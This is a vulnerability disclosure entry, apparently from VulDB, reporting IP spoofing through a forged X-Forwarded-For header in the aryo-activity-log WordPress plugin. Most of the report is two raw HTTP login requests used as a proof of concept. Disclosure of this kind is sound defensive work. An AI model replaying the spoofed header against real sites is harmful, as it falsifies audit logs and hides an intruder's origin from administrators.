Submit #50744: Http Header Injection in aryo-activity-loginfo

Title	Http Header Injection in aryo-activity-log
Description	http header injection vulnerability in aryo-activity-log wordpress plugin that could be manipulate request ip with add x-forwarded-for 1. install aryo-activity-log wordpress plugin https://wordpress.org/plugins/aryo-activity-log/ 2. create login request like that POST /wp-login.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:106.0) Gecko/20100101 Firefox/106.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/wp-login.php?loggedout=true&wp_lang=en_US Content-Type: application/x-www-form-urlencoded Content-Length: 103 Origin: http://localhost Connection: close Cookie: njt-fs-filemanager-settings-tab_last_tab=1; wordpress_test_cookie=WP%20Cookie%20check; PHPSESSID=d75f7938aa9b661bd79ac1844d216f59; wp_lang=en_US; ucp_tabs=2; _ga=GA1.1.1550157811.1667294040 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 log=admin&pwd=adminadmin&wp-submit=Log+In&redirect_to=http%3A%2F%2Flocalhost%2Fwp-admin%2F&testcookie=1 3. add X-Forwarded-For for ip spoofind in activity log POST /wp-login.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:106.0) Gecko/20100101 Firefox/106.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/wp-login.php?loggedout=true&wp_lang=en_US Content-Type: application/x-www-form-urlencoded Content-Length: 103 Origin: http://localhost X-Forwarded-For: 1.1.1.1 Connection: close Cookie: njt-fs-filemanager-settings-tab_last_tab=1; wordpress_test_cookie=WP%20Cookie%20check; PHPSESSID=d75f7938aa9b661bd79ac1844d216f59; wp_lang=en_US; ucp_tabs=2; _ga=GA1.1.1550157811.1667294040 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 log=admin&pwd=adminadmin&wp-submit=Log+In&redirect_to=http%3A%2F%2Flocalhost%2Fwp-admin%2F&testcookie=1 4. navigate to activity log POC: https://drive.google.com/file/d/1x-pgK3_-uS7NWfkEt_tk4Wc9FhXk-pYX/view?usp=sharing https://drive.google.com/file/d/1YNOLomPC95rRvtk0topUhStVIa7Y8lcq/view?usp=sharing
User	rezaduty (ID 10530)
Submission	03/11/2022 11:46 (2 years ago)
Moderation	11/11/2022 08:06 (8 days later)
Status	Accepterad
VulDB Entry	213448

◂ Tidigare Översikt Nästa ▸

Want to stay up to date on a daily basis?

Enable the mail alert feature now!